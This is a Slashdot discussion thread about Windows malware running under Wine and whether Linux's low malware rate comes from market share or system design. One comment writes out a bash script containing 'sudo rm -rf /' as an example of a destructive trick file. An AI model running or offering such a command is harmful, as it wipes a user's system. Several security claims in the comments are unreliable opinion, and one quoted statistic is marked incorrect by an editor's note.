Now Linux Can Get Viruses, Via Wine

fsufitch writes "Wine has advanced enough to make Linux not immune to Windows viruses. However, just like many Wine applications, it takes a bit of effort to get the program off the ground. Also, just like some Windows programs running via Wine, not all features may work — in this case, the crippling of the system, immunity to the task manager, identity theft, etc."

marketshare

[sopssa]

Haven't it always been pretty clear that Wine could run Windows viruses, as long as they don't use some weird low-level tricks (which admittedly many do)?

But for that matter, Linux doesn't have malware only because it's desktop share is next to nothing (not the same amount atleast, there are Linux viruses out too). Mac OSX has been getting more and more viruses lately as it's marketshare has been growing. So would Linux aswell if it ever gained more users.

As long as the OS isn't completely locked down from the user, there will be malware. Windows, Mac, or Linux cant defend you from that. But none of us really want a locked down OS. And as long as the users are stupid their computers will get infected.

It's just about the marketshare.

Re:marketshare

[MadFarmAnimalz]

Haven't it always been pretty clear that Wine could run Microsoft Office, as long as they don't use some weird low-level tricks (which admittedly it does)?

But for that matter, Linux doesn't have MS Office only because it's desktop share is next to nothing (not the same amount atleast, there are Linux office suites out too). Mac OSX has been getting more and more office suites lately as it's marketshare has been growing. So would Linux aswell if it ever gained more users.

As long as the OS isn't completely locked down from the user, there will be office suites. Windows, Mac, or Linux cant defend you from that. But none of us really want a locked down OS. And as long as the users are stupid their computers will get infected.

It's just about the marketshare.

FTFY

Re:marketshare

[sakdoctor]

But none of us really want a locked down OS

WTF?
Microsoft totally fucked up the principle of least privilege from day one. If they hadn't, the damage done by viruses/worms in the history of personal computing, would have been an order of magnitude less.

Re:marketshare

[wizardforce]

So what you're saying is that Linux should be just riddled with various types of malware in the server market because it is both the dominant player in that market and is a significant target considering the server market's importance. Reality seems to disagree with you.

Re:marketshare

To be fair, there's a significant effort to install backdoors/trojans on poorly configured linux machines, but the issue is that they're a much more difficult target as servers do not browse websites with IE nor do they open every attachment you send them via email.

What makes most machines insecure is the users, and since a server normally has only 1 very tech-saavy user, the only openings are in poorly configured services. I know that I had phpbb for a long time, and one day I put in a game playing mod (had some goofy things like achievements and little trophies), and I got hacked via a google search.

Fortunately the guy who installed it didn't finish off his attack by clearing his own history, and the server wasn't running as root, so he only got as far as screwing with the main page.

To say that the server market isn't continually targeted is disingenuous. It's just harder because it isn't operated by a ton of idiots (well, most of the time anyway).

Re:marketshare

But for that matter, Linux doesn't have malware only because it's desktop share is next to nothing

Then why do linux server not have viruses? Windows servers do, and Linux has a much bigger market share.

Re:marketshare

[0100010001010011]

A link to all those hundreds of OS X viruses that are coming out?

Re:marketshare

[Storchei]

Haven't it always been pretty clear that Wine could run Windows viruses, as long as they don't use some weird low-level tricks (which admittedly many do)?

But for that matter, Linux doesn't have malware only because it's desktop share is next to nothing (not the same amount atleast, there are Linux viruses out too). Mac OSX has been getting more and more viruses lately as it's marketshare has been growing. So would Linux aswell if it ever gained more users.

As long as the OS isn't completely locked down from the user, there will be malware. Windows, Mac, or Linux cant defend you from that. But none of us really want a locked down OS. And as long as the users are stupid their computers will get infected.

It's just about the marketshare.

I think you simply did not get the idea of open source. Of course there can be viruses for Linux and open source OSs, but which is the probability they survive? Why? Because of the very core of open source success, EVERYONE who wants can take a look at the code and improve it. Beyond that, who will create a virus for a soft built by her/himself?? I think as Linux/open source OSs gain market they are more exposed, but their essence make then more reliable and protected of malicious code. Of course they are not perfect, but they are by far more efficient/reliable than commercial OSs. I think the skills of a person who intends to write a virus for linux/open source OSs should be BY FAR higher than the skills of a person who intends to write a virus for Windows/Mac, just because linux/open source code is constantly reviewed by millions of people thus the virus writer must be clever than those millions to find a hole nobody else did. In summary, I find linux/open source OSs BY FAR more reliable than windows/commercial OSs. There is no perfect OS, there is a suitable one instead. I think if people takes care of the software they use, among other things, the possibilities of getting a virus are minimum. Regards!

Re:marketshare

[wintersdark]

Thinking that you're safe running OSX is very foolish. It IS more secure than Windows, but it can get viruses too. As OSX increases in market share, you will find more viruses appearing for it too. It'll take a little longer to get started - Everyone got great Intro Virus Production 101 classes in grossly insecure older versions of Windows, after all. OS X is indeed a more secure operating system, but it is not an invincible one. Assuming you are and will always be safe because you're running it is a very bad idea.

Re:marketshare

[bhtooefr]

The problem is, for a home computer, you are your own sysadmin.

And then the dancing bunnies problem comes into play.

User: "Oooh, I can download this to see dancing bunnies." *downloads and executes malware*
Malware: *tries to install*
OS: "Malware needs root access to install. Please enter your root password." (Windows version of this would be "Cancel or Allow.")
User: *enters root password*
Malware: *infects system*
OS: *pwned*
User: *pwned*

Re:marketshare

[aitikin]

Yes, but until a virus comes out for it (which they haven't yet, with the possible exception of proof of concepts) and when it does, everyone will know immediately cause news of it'll be all over the place.

Re:marketshare

[zmollusc]

If I was teh evil malwares writer, I would target OSX as its users have piles of cash. The trick would be to make your pop-up so beautifully coloured, shaded, animated and raytraced that the style-obsessed mac user would fill in his credit card details immediately.

Re:marketshare

[shentino]

Windows, however, is bigger overall.

And you don't really need a beefy server in your botnet. A desktop will do just fine.

Re:marketshare

[cenc]

I have been running linux machines for going on 10 years now, including my home, all the computers in my office, dozens of servers with every imaginable piece of software and configuration possible (some secure some insecure) in that time, I as yet to ever find one virus, malware, or evidence that a serious attempt was ever made any progress.

The market share argument just does not cut it. You would think there would be at least one well know case in the wild by now of a linux virus spreading to other linux machines in a sustained and ongoing manner.

The best we have are 'just so' cases. The software, permissions, user, network, and so on had to be just so in order for virus or malware to work. But a general widespread linux virus? Where are they?

Re:marketshare

[sopssa]

Google query

Re:marketshare

[0ld_d0g]

Server admins are 10 orders of magnitude more paranoid about security than the average Windows user who clicks on random ads and gets infected. Which BTW, Servers are never used for. (casually browsing the net)

Re:marketshare

[lukas84]

Infected copies of Apple's iWork are already floating around.

http://gizmodo.com/5139116/os-x-iwork-trojan-revamped-repackaged-rereleased-in-photoshop

Re:marketshare

[Nerdfest]

Yeah ... but dancing bunnies .... it is a tough call.

Re:marketshare

[0100010001010011]

That looks like Malware. Stuff that people install voluntarily because of social engineering.

I could put:
-
#!/bin/bash
sudo rm -rf /
-
into a file tell you that it'll give you more free hard drive space.

I'm talking about Viruses & Trojans. The stuff that is automated and requires 0 user interaction. The stuff that infects an XP SP1 machine with in 20 minutes of being on the internet.

Re:marketshare

[amilo100]

You would think there would be at least one well know case in the wild by now of a linux virus spreading to other linux machines in a sustained and ongoing manner.

Have you ever thought about how viruses spread? A lot of Windows users get viruses or adware by downloading a program from a website (e.g. P2P programs, games, etc...). Most Linux users get their software via official repositories - which removes that method in which viruses spread. When last did you download a Cracked Copy of a Linux game of software package?

Re:marketshare

[ctmurray]

So you get a virus from an pirated copy of iWorks. (and Photoshop). And you have to give the program root access. Hmm....

Re:marketshare

[hcmtnbiker]

The market share argument just does not cut it. You would think there would be at least one well know case in the wild by now of a linux virus spreading to other linux machines in a sustained and ongoing manner.

What? That's exactly why market-share is so important. You're assuming they can find other linux machines. And how would they do this? How would it discover other machines? This is hard enough to do with a windows host, let alone one that has ~1/100 the market-share.

Re:marketshare

[dontmakemethink]

Think of it from a the perspective of the imps making the viruses (and no, it's not 'virii'). Pretend you're a spineless asshole that wants to cause as much damage as possible. Do you use widespread tools to make a Windows virus with relative ease and hit the biggest user base, or do you spend much more time finding vulerabilities in better OS's and hit a much smaller user base?

99 times out of 100 it's the former scenario that plays out. Doesn't mean you needn't run anti-virus software on OS X, for example, but you can have much more confidence that nothing will get past it. Running XP doesn't scare me, it's the number of viruses that Avast catches that scares me.

Re:marketshare

[sopssa]

Now a days you don't really get automated viruses on Windows either, I haven't got any since something like Windows 98. Most of automated infections usually come from a websites exploiting Flash or PDF too, and that's not really Windows fault.

(* excluding whatever it was that Conficker was exploiting an year ago, but that too was patched many months before)

Re:marketshare

[lukas84]

How's that different from the usual infection vectors on Windows?

User downloads program from shady site. Executes it and agress to the UAC prompt. Bam. All done.

Re:marketshare

[cenc]

That would be fairly easy to determine. I just need to have a look at my web site server logs to see all the information about my visitors OS, the version, and so on, not to mention you have about a 60% chance of any given server being linux.

Re:marketshare

[zigmeister]

I mostly agree. However Linux (and Mac) are much more immune to what are strictly viruses. What they are not much more immune to are trojans*, which I think constitute ~80-90% of infected Windows desktops. Here's my theory to dispel the myth of how robust Linux is(when in the hands of a typical user): Write a malware program that is a variant on the dancing bunnies. Put it up for download. User must have dancing bunnies or else. User clicks to download, then selects Open with Package Manager. User enters root password to install then since security signature is missing must enter it again. Malware program now installed.

*I'm aware of least privilege. However with more and more of the total desktop market being in the home, most users will have their root passwords (i.e. not in a corporate environment) and see no difference between entering that and clicking continue on a bunch of UAC prompts. To make matters worse they will be conditioned to "Force install" since a decent amount of apps that are safe that they want don't provide security signatures either. E.G.: World of Goo, Hulu Desktop Client, commercial games if they ever come etc.

Re:marketshare

[Stupendoussteve]

It is foolish.

Just as foolish as thinking you're automatically safe running Linux, though admittedly repositories remove a lot of the danger. OS X and Linux generally do not suffer from the second-you-get-online worms that Windows has been known for, but they are not immune to malware if the user is uneducated or unconcerned. This will always be the best attack vector.

Re:marketshare

I should clarify that "hacked by a google search" is in reference to the fact that he used google to find the vulnerable service on my server, then proceeded to actually attack me using said vulnerability.

Sorry, I just realized how silly that sounded...

Re:marketshare

[sopssa]

http://en.wikipedia.org/wiki/Linux_malware#Threats

There's quite a few viruses and worms too.

Re:marketshare

[Stupendoussteve]

OS X Snow Leopard notices the two trojans which are in the wild.

They didn't do anything extreme, and they were installed by stupid users pirating software, but they do exist.

Re:marketshare

[cheftw]

That looks like Malware. Stuff that people install voluntarily because of social engineering.

I could put:
-
#!/bin/bash
sudo rm -rf /
-

I remember reading that it's better practice to write that

sudo rm / -rf

since putting your switches at the end (especially on rm) makes it easier to catch stupid mistakes (like hitting return early).

Not that in your case it's a huge deal.

Re:marketshare

[Stupendoussteve]

You're talking about a worm.

Viruses and trojans deal with files and need some type of user interaction.

Re:marketshare

[TheRaven64]

Except on BSD systems, which only accept arguments before other arguments. This prevents someone from putting a file called -rf in a directory, so when you run rm * the -rf won't be expanded and treated as an argument. If your system doesn't do this, then you should get into the habit of putting -- after the arguments and before the options.

Re:marketshare

[Runaway1956]

"But for that matter, Linux doesn't have malware only because it's desktop share is next to nothing"

I keep hearing that. Everyone says it so it must be true. But, I'm mindful of the fact that only a handful of viruses have EVER been written for Linux, and that the User can't infect the underlying system. It takes Root access to do so, something that is only now beginning to be true for Windows.

It seems that Windows is improving it's security model - but they still haven't caught up with Linux, despite what the fanboys might have to say. Unlike XP, it has always been possible to lock the User down pretty tightly, but still allow User to play any game on the system. More, it has almost always been possible to allow a User to install his games and applications in User Space. That isn't possible with Windows, even with Win 7. When I can create a dozen users, each of whom allows serious infections WITHIN HIS OWN ACCOUNT, but the Admin account remains untouched and unharmed, THEN Windows will be well on the road to having a meaningful security model.

Whatever - I'll believe the basic premise that Linux would be just as vulnerable as Windows if it had market share when I see it. To me, it seems the structure and the philosophy of Linux contradicts what common "wisdom" says.

Re:marketshare

[selven]

Or, alternatively:

User: Oooh, I can download this to see dancing bunnies
->sudo apt-get install dancingbunniez
OS: password required
Malware:*infects system*
OS:*pwned*
User:*pwned*
User: Hey, that wasn't very nice! I'm gonna report this package and no one downloading from repositories will be harmed by it again!
Malware:*pwned*

Re:marketshare

[Bert64]

The idea of multiuser is to protect one user from another... You wouldn't be able to keylog other users at least, and sending spam is something that identd on unix was supposed to deal with, tho the prevalence of single user systems has rendered ident pretty much totally worthless.

Also, nonroot malware is much easier to remove, especially on unix, because there are only a very limited number of places it can hide on the filesystem, it can't do neat tricks like mark areas of the disk corrupt and hide there, it can't hide in system directories amongst the thousands of other files already there, it cant modify the kernel to hide itself... It will show up in the process list when running, whereas with admin privileges it can easily hide itself to the point that you need to boot from clean media.

Re:marketshare

[abigsmurf]

Malware makers do not want to hack *you*. They want to hack thousands of systems in a short space of time before a vulnerability is patched.

Why spend weeks finding an unpatched vuln and exploiting it so you infect a dozen or so people? You've then got people who are under a solid firewall so can't send their credit card info, the people who never type in any notable passwords or credit card information and people who notice they're infected and clean it before any damage has been done.

You may get one or two purchases from each credit card you find before it gets blocked (if that). If you can't ensure that you've got thousands of systems to potentially get CC info and passwords from, it's not going to be worth your time as a malware developer. Especially when the same effort targeted at something with a 90% user base will get you exponentially more CC numbers.

Re:marketshare

[evilviper]

As long as the OS isn't completely locked down from the user, there will be malware.

If you operate as a non-privileged user, and there aren't gaping local root exploits, malware is pretty damn toothless.

Sure, it could still send out some e-mails, record your keystrokes, etc., but it will show up in `ps` just like any other process, and it will have to launch itself from a few standard few locations available, where it will be easy to find, and stop from running.

So, yes, Linux could have malware, but it would be the minor nuisance type, rather than the "everyone's infected, it's impossible to remove, and the internet is being brought to its knees" type.

Additionally, the problem with Linux viruses is that people get their software from a central repository, with cryptographic checksums and the like. The world would be very different if Windows users got all their software through WindowsUpdate, instead of constantly downloading crap from random websites.

Re:marketshare

[nneonneo]

The only problem with this scenario is that it assumes that the user has been conned into adding some unchecked repositories, something which is not terribly easy to do (at the very least you have to go out of your way to do this, such as editing a configuration file, mucking with the settings in some GUI, etc.), and which a regular Joe would probably never do (since the system-default repositories are likely to be sufficient for him).

On the other hand, the user might end up downloading a package, self-extracting shell script, tarball or some other program containing malware off the Internet, and infect himself by executing it, regardless of how sane the package manager is. Most Linux users are, as far as I can tell, fairly well-versed in computer knowledge, and so this is an unlikely scenario. However, if Linux gets to the point where the "unwashed masses" can use it, then I would expect this sort of malware to increase in frequency.

Re:marketshare

[mister_playboy]

A server is for more useful in a botnet, it most likely runs 24/7 and has a fat internet connection.

Re:marketshare

[1s44c]

But for that matter, Linux doesn't have malware only because it's desktop share is next to nothing (not the same amount atleast, there are Linux viruses out too). Mac OSX has been getting more and more viruses lately as it's marketshare has been growing.

There are more than enough unix and linux machines on the net to make them a viable target yet these machines don't seem have the same problems. They do get cracked but normally due to bad PHP code or people setting guessable passwords.

Windows doesn't get viruses because lots of people use it, it gets viruses because it has a thrown together design and it's poorly implemented.

Re:marketshare

[CarpetShark]

The problem is, for a home computer, you are your own sysadmin.

No, the problem is that home users who aren't sysadmins think they can be sysadmins. It's like selling cars to people who know nothing about engines, letting them "customise" the engine before driving it into the city, and complaining about how their spam (and other groceries) end up all over the park benches.

Re:marketshare

[tverbeek]

Mac OSX has been getting more and more viruses lately as it's marketshare has been growing.

[Citation needed]

Re:marketshare

[1s44c]

What? That's exactly why market-share is so important. You're assuming they can find other linux machines. And how would they do this? How would it discover other machines? This is hard enough to do with a windows host, let alone one that has ~1/100 the market-share.

Nmap can guess IPs, it can find thousands of windows and linux machines in not very much time.

Linux viruses could find many other hosts to infect at least as fast as nmap can but they don't. The market share argument really does not add up.

Re:marketshare

There are no know viruses currently available for Linux in the wild.
The last one was in 1989.
When people say that viruses exist for Linux, they are correct.
Those viruses are create in "labs" and were not released to public.
Main reason is because of root privledges, the viruses can not spread easily.

I've been running linux for 5 years with no anti-virus and still havne't gotten a virus yet!!!

Re:marketshare

[MichaelSmith]

My wife runs ubuntu on her laptop. He is away in Malaysia at the moment taking care of family business and she needed to get online. So she goes to this internet cafe and they give her a CAT5 cable which she plugs in. I have set her up with a VPN so comms are secure. She thinks something is wrong so she asks for help. The internet cafe people start stuffing around with network interfaces and she types her password in for them. So now all I know is that she gave these people root access when she had no idea what was going on.

She is a non-technical person and she will do the stupidest things, regardless of the OS she runs.

Re:marketshare

[hcmtnbiker]

Except *doze server machines arn't compromised anymore often then *nix ones because they're both properly maintained.

OSX on the other hand is showing lots of justification for market-share vs malware. Ever since they peaked to 5% they've become a target, unless you want to say that they've also lost what made them secure at the same time.

Re:marketshare

[bhtooefr]

It's impractical for home users to hire a full-time sysadmin, though.

To use the car analogy, requiring home users to have a sysadmin to use a computer is like requiring car owners to have a chauffeur.

Re:marketshare

[Runaway1956]

Well - there is that. No matter the OS, Root can always do something stupid. We can only be protected from ourselves so far.

The funny thing is, she shouldn't have needed root access to do anything at all. I just clicked on "Network Settings", and sure enough, I can change the parameters for any of my ethernet connections as a user. I can't install, or uninstall an ethernet card without Root, but I can change parameters. God only knows what those "support" people mucked around with once they had Root.

Re:marketshare

[Jerry+Smith]

How's that different from the usual infection vectors on Windows?

User downloads program from shady site. Executes it and agress to the UAC prompt. Bam. All done.

Both Photoshop as iWorks are downloadable from the company sites, as time-limited demo. But you're right: the user has to have a minimum amount of stupidity, a usual infection vector.

Re:marketshare

[sbenson]

"Linux doesn't have malware only because it's desktop share is next to nothing"

The quote above immediately allows me to discredit your entire post and file you away with the tag: "Knows not of which he speaks."
The market share babble is FUD. There are fundamental design differences in the operating systems.

If you don't know, learn. You really shouldn't spread FUD.

Re:marketshare

[Jurily]

Yeah ... but dancing bunnies .... it is a tough call.

Don't underestimate lusers. There are 8 year old girls who know more about computers than their parents.

Re:marketshare

[RocketRabbit]

You ought to read up on cloaked rootkits.

Interesting stuff there.

Re:marketshare

[Zancarius]

Except on BSD systems, which only accept arguments before other arguments. This prevents someone from putting a file called -rf in a directory, so when you run rm * the -rf won't be expanded and treated as an argument.

Which BSD?

FreeBSD:

[vbox:example]$ ls -l
total 0
[vbox:example]$ touch -- file1 file2 file3 file4 -rf
[vbox:example]$ mkdir dir
[vbox:example]$ ls -l
total 2
-rw-r--r-- 1 test test 0 Oct 24 16:16 -rf
drwxr-xr-x 2 test test 512 Oct 24 16:16 dir
-rw-r--r-- 1 test test 0 Oct 24 16:16 file1
-rw-r--r-- 1 test test 0 Oct 24 16:16 file2
-rw-r--r-- 1 test test 0 Oct 24 16:16 file3
-rw-r--r-- 1 test test 0 Oct 24 16:16 file4
[vbox:example]$ rm *
[vbox:example]$ ls -l
total 0
-rw-r--r-- 1 test test 0 Oct 24 16:16 -rf

I assume you're talking about a specific shell or rm binary--AFAIK, they all exhibit the same behavior in recent releases.

Re:marketshare

[colourmyeyes]

Malware: *tries to install*
OS: "Malware needs root access to install. Please enter your root password." (Windows version of this would be "Cancel or Allow.")
User: *enters root password*

A Linux box with a NOPASSWD 'sudo' setup would skip all of this and go right from "executes malware" to "infects system."

Re:marketshare

[techno-vampire]

My wife runs ubuntu on her laptop. He is away in Malaysia at the moment taking care of family business...

I think the above is the most fascinating typo I've seen in a long time. You are to be congratulated, sir.

Re:marketshare

[bertoelcon]

To use the car analogy, requiring home users to have a sysadmin to use a computer is like requiring car owners to have a chauffeur.

Its more like having a personal mechanic.

Re:marketshare

[coryking]

Hey, that wasn't very nice! I'm gonna report this package and no one downloading from repositories will be harmed by it again!

If it is mainstream OS with more than a fraction of the market share, people won't be downloading from repositories no matter what the Linux people think.

Re:marketshare

[coryking]

It may come as a surprise to you, but unix servers are a great place to host eggdrop bots and all kinds of various daemons for controlling IRC warez/botnet channels.

You haven't been in this long or you'd have at least one or two servers get rooted through Bind, PHP or something similar and discover a script kiddie running some damn thing or other.

Re:marketshare

[Hucko]

It's just about the marketshare.

It's about the marketshare if you ignore the ratios. Macs are supposed to have ... 5% marketshare? They and the other OS have a much lower ratio of malware per install. Yes, Windows locked down should be just as secure as any other OS... but it is too easy to change its security for convenience sake --- at least up till XP. I haven't administered a network (or even a machine) of Windows Vista and above, so they may be much better for all I know.

Re:marketshare

[orange47]

and what happens when you are in sudoers list? (I think most Linux home users are, for easy software upgrades and similar)

Re:marketshare

[The+MAZZTer]

I prefer marching penguins. (Windows port)

Re:marketshare

[BluBrick]

Yeah ... but dancing bunnies .... it is a tough call.

Don't underestimate lusers. There are 8 year old girls who know more about computers than their parents.

Why do you think the malware authors chose dancing bunnies and not strippers? Even 8 year old girls who know more about computers than their parents can do stupid things with the right motivation.

Re:marketshare

[sopssa]

They already have, and lots of people on slashdot probably are familiar with the situation when a friend/family member/neighbor calls you because "something is wrong with the computer" and as a "computer guy" you can fix it. for free, of course.

Re:marketshare

[BikeHelmet]

You are absolutely correct.

Weatherbug, anyone? ;)

Re:marketshare

[LocalH]

It's all about balance and good system design. Windows has to deal with a lot of backwards compatibility kluges that Linux generally doesn't, and thus Windows has to strike a balance between compatibility and security (which is much of what UAC is all about, with software that stores shit in the actual program folder as opposed to using the user's home directory). No OS is completely locked down from the user, yet Linux and MacOS tend to be better protected against malware simply by design, because they don't have to worry about people using 10 year old apps and complaining that they don't work because they worked in an insecure way (which was the norm back then) and such UAC exposes their flaws. My uncle runs Vista on two computers and I provide him with support. I never see UAC prompts unless I'm doing one of two things:

1) Intentionally modifying system files or C:\Program Files (and in this case, UAC is behaving as designed).
2) Installing old software that hasn't been updated to use the home directory instead of storing data in C:\Program Files (older versions of DAZ 3D do this).

Personally, I still run XP because I don't have hardware capable of running Vista or 7 at its most efficient. That doesn't mean that Vista and 7 are bad, just that I don't have hardware capable of giving me the full experience.

For the average home user, Vista is good enough, and 7 is even better. Microsoft have made major strides in enhancing security while balancing that with the crutch known as backward compatibility. The fact that Windows 7 32-bit will pretty much run all user-mode software ever released for Win95 (that didn't rely on 16-bit portions of the OS) tells me that, while Microsoft isn't perfect, they have done as best as they can to make sure that security and backwards compatibility are balanced.

Re:marketshare

[LordLimecat]

Doesnt that depend on whether things like SELinux or AppArmor are set up? It was my understanding that those were designed to prevent even userland programs from accessing resources that they were not explicitly granted access to-- like firefox being denied access to wine directories or from opening listening ports, etc.

Re:marketshare

[RalphSleigh]

Having used linux on the desktop for more than 5 minutes, I am quite happy downloading and installing random .debs I find on the interlolz, because its not in the repo/a more up to date version. Malware thats easy to manage and update is still malware.

Re:marketshare

[maxume]

Post XP SP2, Windows has also largely been immune to the second-you-get-online worms, as the built in software firewall blocks inbound connections by default.

Re:marketshare

[jonadab]

> Linux doesn't have malware only because it's
> desktop share is next to nothing

On the contrary, there's actually quite a lot of malware out there for Linux systems. This makes sense, because Linux has quite good market share in server space, and servers tend on average to have quite good internet connections and a lot of available system resources and be left turned on all the time, sometimes for months without so much as a reboot. This makes them more *useful* (to malware), on average, than Windows systems.

However, the malware for Linux systems tends not to be viruses in the traditional sense (inserting itself into existing executable files). There are a collection of reasons for this, but they all pretty much boil down to this: that's just not the most effective way to do things on Linux.

Re:marketshare

[jonadab]

> Then why do linux server not have viruses?

Because if you're writing malware for Linux systems, a virus is not the easiest or most effective way to go. Attaching to system binaries is problematic for a variety of reasons. System binaries can be updated at any time. Changes in their size and signature are easily detectable. Furthermore you have to be root to do it, but you wouldn't install a virus if you're root, because you'd use a rootkit instead in that case. A rootkit is more likely to remain on the system undetected for a longer period of time. There are more reasons, but you get the idea: a virus for Linux doesn't make sense. Some other kind of malware, such as a worm or rootkit, does.

(And if you think Linux servers don't have malware, I have some nice beachfront property in Montana that I can sell you at a great discount.)

Re:marketshare

[fluffy99]

Just having SELinux install and enforcing is useless, unless someone has gone through and written proper policies that define the mandatory-access-control limitations. Policies have been written for many service such as Apache, but there is still a dearth of appropriate policies for user apps.

Re:marketshare

[donkey55b]

This story [while interesting] says more about your relationship with your wife and about how Ubuntu tries to be "as easy as windows" by not having a root password, than it does about anything else.

Re:marketshare

[jwisser]

Can't vouch for hundreds, but I got hit with a trojan last year that installed a keylogger. Happily, the person who got my passwords was an idiot, and actually apologized to me when I tracked him down and sent him his own IP address. Long story short, though, Mac users shouldn't be too cavalier about malware; I got hit despite being pretty knowledgeable and careful about where I go on the web.

Re:marketshare

[Valdrax]

Did you actually read the links you provided?

The plural of virus is viruses. In reference to a computer virus, the plural is often believed to be virii or, less commonly, viri, but both forms are neologistic folk etymology and no major dictionary recognizes them as alternative forms.

(emphasis added)

The article then goes on to mention that virus was a mass noun that *had* no plural in Latin and then goes through every single way to pluralize a Latin word ending in -us, showing that -ii is never an appropriate way, and it mentions that as an English adopted word, there would be no obligation to use a Latin conjugation instead of adding -es for an English word.

In other words, "viruses" is the only valid pluralization because it's the only conjugation is can have in the absence of proper Latin pluralization.

Re:marketshare

[donaldm]

But for that matter, Linux doesn't have malware only because it's desktop share is next to nothing (not the same amount atleast, there are Linux viruses out too). Mac OSX has been getting more and more viruses lately as it's marketshare has been growing. So would Linux aswell if it ever gained more users.

I suppose 20 to 60 million Linux desktops world wide is next to nothing and I have two of them, however the main reason why Linux distributions are difficult to write viruses for is because most distributions insist on you working as a normal user and not with elevated privileges like you have with MS Windows distributions. Writing a virus for Linux or Unix for that matter is easy however it requires the user to deliberately run the mall-ware and running it with normal user privileges is next to useless. Ok you stuff up that user but you have not rooted the machine. Another reason why Linux distributions are not popular with mall-ware writers is the fact that Linux users are normally more computer literate and it is much more of a effort and risk targeting Linux since there are many distributions and you do have very smart people who would take it as a challenge to track down the writers of the mall-ware. This is not something the average mall-ware writer wants.

Actually Linux is extremely popular with mall-ware writers since it is an excellent platform to develop mall-ware on. If you were a mall-ware developer why would you want to target Linux when it is so much easier to target MS Windows? As for targeting Mac's. Even though Mac's run a Unix OS the easiest way to compromise a user (Linux is vulnerable here as well) is to use social networking in that the black-hat tries to get personal information from the unsuspecting user by pandering to social worries such as "This is YOUR_BANK, we need to check our customers security. Please send us your financial details and relevant passwords so we can check that your account has not been compromised. Please don't send any details via normal email or registered post, login the the following URL and enter your details". Who would fall for something like that? I don't think that many but you only need 0.001% of the total population of computer users and the scammer has rich pickings.

Re:marketshare

[Qu4Z]

Why not? I hear people use the iPhone App Store on occasion...

Can you give me a good reason why no-one will download from repositories? (I'm sure they won't know what a repository is, but...)

Re:marketshare

[Qu4Z]

So... like Windows then?

Re:marketshare

[donaldm]

I have set up my Fedora Linux machine such that non technical wife does not need to know the root password. Since I have been using Linux as my desktop (over three years) I don't configure "sudo" either since my wife does not need to do anything on my machine that requires elevated privileges.

Re:marketshare

[MichaelSmith]

What does she do if the is in another hemisphere and timezone from you, and she needs to configure a static IP address?

Re:marketshare

[the_womble]

So why there so little targeted at Linux servers, where its market share is high? Especially as many Linux servers are run by less than expert admins in VMs running websites etc.

Your argument also fails to explain the huge discrepancy in malware numbers. There is very little Linux malware.

Assume:

1) Linux has 1% or so desktop market share (and it has at least that)
2) It has been more sucessfull in developed countries (where it has a price advantage - no one pays for software in the third world anyway)
3) Compromised machines are more valuable in developed countries (do some research into botnet pricing if you do not believe me)

So why does Linux not even 1% of desktop malware?

As a user, why should I care about why I do not get malware. The fact that I do not is a huge advantage of Linux

Re:marketshare

[GrandTeddyBearOfDoom]

Also, with linux, the fact that there are so many subtly different distributions and kernel revisions and suchlike for the malware author to worry about also help to make the writing linux malware thing more trouble than it's worth.

Re:marketshare

[CrossChris]

Linux doesn't have malware only because it's desktop share is next to nothing

Nonsense. Linux doesn't have any malware because its structure doesn't allow malware to work. Windows is vulnerable because of some stupid "ease of use" decisions made in its early days, and the retarded reluctance of MS to make Windows any "harder to use".

The thing that MS have missed, and will miss until their demise, is that Linux is now easier to use, for the average user, than Windows. The user doesn't have to worry about endless, useless "anti-virus" downloads, time and hardware-wasting "malware scans", and websites deliberately set up to use the vulnerabilities inherent in Windows.

Game Over, Microsoft!

Re:marketshare

[Monsuco]

It's just about the marketshare.

In that case what is the deal with Microsoft Internet Information Services? It has a significantly lower market share than Apache, yet has seen more serious security problems.

Re:marketshare

[Alsn]

Define useful?

A server is way more likely to be "found out" as being in a botnet by its user(the admin) than a home computer is. At most it would be useful for a short while and then the admin would take care of the problem one way or another.

Why would you design a virus that to servers if that is the case(and I'm assuming it is)?

Re:marketshare

[jhol13]

Most malware does not really need root/administrator privileges.

It would be trivial to make a keylogger or spam-robot in Linux running from e.g. .bashrc. Same for any other OS there is.

Re:marketshare

[rohan972]

The number of people travelling overseas and handing their root password over at an internet cafe is unlikely to ever reach the levels needed for the widespread distribution of malware, so while it is possible to get an infection in such a situation it's not really a big problem.
As for your response to another poster who said not to give her root access:

What does she do if the is in another hemisphere and timezone from you, and she needs to configure a static IP address?

No internet cafe should require root access to your laptop for you to connect. No doubt she will not hand it over again after you explain it to her. If that's a laptop used to access things that must remain secure (as it seems from your post) I'm sure you would prefer a call or SMS at any time of day instead of having that computer compromised, if it's not important enough to call you, it's not urgent enough to let random strangers access either.

Re:marketshare

[adolf]

Because they wants their bunnies, which aren't aren't included in the repositories.

To wit:

For the OMG Ponies!!2! screensaver, just save this file to your desktop, and double-click your mouse on it when the download finishes. Then just follow the instructions on the screen, enter your password when prompted, and you'll be all OMG! in no time!"

Re:marketshare

[reashlin]

Surely this is down to the shell not the particular kernel you are using

Re:marketshare

[ChienAndalu]

Strange. I always thought that zsh would expand the * wildcard in a way that everything would be interpreted as a path. Thanks for the info.

Re:marketshare

[Foolhardy]

Since Windows NT 3.1 (in 1993) it's been possible to lock a normal User down pretty tightly. Normal users can't infect the underlying system. It takes membership in the Administrator's group or certain privileges to do so.

Can you name a specific deficiency in system design that allows a normal user in any NT derived version of Windows to infect the system or other user accounts?

The reason that some games don't run properly as a normal user is because they are badly written or want to install kernel DRM/copy protection drivers. Games have always had access to the resources they would legitimately need to run.

Re:marketshare

[Runaway1956]

Citation, or it ain't so. 800 Linux viruses? I haven't read anything like that. 200,000 Windows viruses?

http://www.securityfocus.com/columnists/188

Of course, it's not just "regular folks" on mailing lists who share this opinion. Businesspeople have expressed similar attitudes ... including ones who work for anti-virus companies. Jack Clarke, European product manager at McAfee, said, "So we will be seeing more Linux viruses as the OS becomes more common and popular."

Mr. Clarke is wrong.

Sure, there are Linux viruses. But let's compare the numbers. According to Dr. Nic Peeling and Dr Julian Satchell's Analysis of the Impact of Open Source Software (note: the link is to a 135 kb PDF file):

"There are about 60,000 viruses known for Windows, 40 or so for the Macintosh, about 5 for commercial Unix versions, and perhaps 40 for Linux. Most of the Windows viruses are not important, but many hundreds have caused widespread damage. Two or three of the Macintosh viruses were widespread enough to be of importance. None of the Unix or Linux viruses became widespread - most were confined to the laboratory." >>Editor's note: unfortunately we have been made aware that this quote by Dr. Peeling and Dr. Satchell is incorrect; the independent WildList organization produces a monthly "in the wild" list of viruses. While the vast majority of viruses in their report are Windows-based, there are still some Linux-based viruses (listed as "Other") found in the wild as well.>>

